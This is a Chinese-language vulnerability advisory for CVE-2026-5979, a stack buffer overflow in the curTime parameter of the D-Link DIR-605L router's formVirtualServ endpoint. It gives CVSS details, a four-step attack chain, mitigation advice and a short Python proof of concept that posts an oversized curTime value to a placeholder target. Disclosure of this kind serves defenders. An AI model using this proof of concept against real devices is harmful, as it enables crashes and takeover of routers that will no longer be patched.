CVE-2026-5979 CVSS 8.8 高危

CVE-2026-5979 D-Link DIR-605L 缓冲区溢出漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5979

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-605L

漏洞概述

D-Link DIR-605L路由器固件2.13B01版本中存在严重的缓冲区溢出漏洞。该漏洞位于/goform/formVirtualServ组件的POST请求处理逻辑中，因未对输入参数curTime进行严格的长度限制，导致栈缓冲区溢出。鉴于该设备已过保停止维护，攻击者无需用户交互即可远程利用此漏洞，可能导致设备崩溃或被植入恶意程序，造成严重安全风险。

技术细节

该漏洞的根源在于D-Link DIR-605L固件中处理/goform/formVirtualServ接口POST请求的函数存在逻辑缺陷。具体而言，程序使用不安全的函数直接将用户可控的curTime参数值复制到栈上的局部缓冲区，而未验证输入数据的长度是否超过缓冲区容量。当构造超长的恶意字符串作为curTime参数值发送时，多余的数据将溢出缓冲区边界，覆盖栈上的返回地址或相邻变量。根据CVSS 3.1评分向量，该漏洞具备远程网络攻击向量（AV:N），攻击复杂度低（AC:L），且无需用户交互（UI:N）。攻击者仅需具备低权限（PR:L）即可发起攻击。利用成功后，可导致高程度的机密性、完整性和可用性损失（C:H/I:H/A:H），通常表现为远程代码执行（RCE）或设备拒绝服务。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描发现暴露在互联网上的D-Link DIR-605L设备，并识别其固件版本。

STEP 2

步骤2：漏洞利用

攻击者向目标设备的/goform/formVirtualServ接口发送特制的HTTP POST请求，其中curTime参数包含超长的恶意数据。

STEP 3

步骤3：溢出触发

设备在处理请求时，由于未检查curTime长度，导致栈缓冲区溢出，覆盖返回地址。

STEP 4

步骤4：代码执行

程序流程被劫持，跳转执行攻击者植入的Shellcode，从而获取设备的控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the vulnerable endpoint
target_url = "http://<target_ip>/goform/formVirtualServ"

# Payload generation
# This payload attempts to trigger a buffer overflow by exceeding
# the expected buffer size of the 'curTime' parameter.
# The specific offset may vary based on firmware analysis.
buffer_size = 500
payload = "A" * buffer_size

# Prepare POST data
data = {
    "curTime": payload
}

try:
    # Send the malicious request
    print(f"Sending payload to {target_url}...")
    response = requests.post(target_url, data=data, timeout=5)
    
    # Check response
    if response.status_code == 200:
        print("Request sent successfully. Check device for crash or shell.")
    else:
        print(f"Received status code: {response.status_code}")
        
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

D-Link DIR-605L 2.13B01

防御指南

临时缓解措施

鉴于D-Link已停止对DIR-605L的技术支持，目前不存在官方补丁。作为临时缓解措施，用户应确保路由器不直接暴露在公网，通过防火墙限制入站流量，并关闭远程管理功能。强烈建议尽快更换设备以消除根本风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5979
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5979
3 Details https://www.cvedetails.com/cve/CVE-2026-5979/
4 VulDB https://vuldb.com/cve/CVE-2026-5979
5 Link https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formVirtualServ-33153a41781f80b496e1de206077bc7e?source=copy_link
6 Link https://vuldb.com/submit/791852
7 Link https://vuldb.com/vuln/356533
8 Link https://vuldb.com/vuln/356533/cti
9 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表